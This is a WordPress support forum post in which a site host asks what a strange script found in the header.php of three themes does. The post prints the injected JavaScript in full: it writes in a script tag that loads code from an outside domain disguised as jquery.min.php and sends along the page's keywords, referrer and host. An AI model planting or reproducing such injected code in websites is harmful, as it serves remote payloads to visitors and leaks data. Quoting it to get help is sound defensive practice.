• Resolved Mindas22

    (@mindas22)


    I got to host wordpress website. Wordfence finds no issues. But I found some strange code in header.php in three installed themes. (twentyfifteen one of them)

    <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="https://www.teak71.it/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('https://www.teak71.it/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>

    Can anybody tell what it does? and what else should I check?

    Thank You!

    https://www.ads-software.com/plugins/wordfence/

Viewing 2 replies - 1 through 2 (of 2 total)
Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Manualy found strange script in header.php – but wordfence did not.’ is closed to new replies.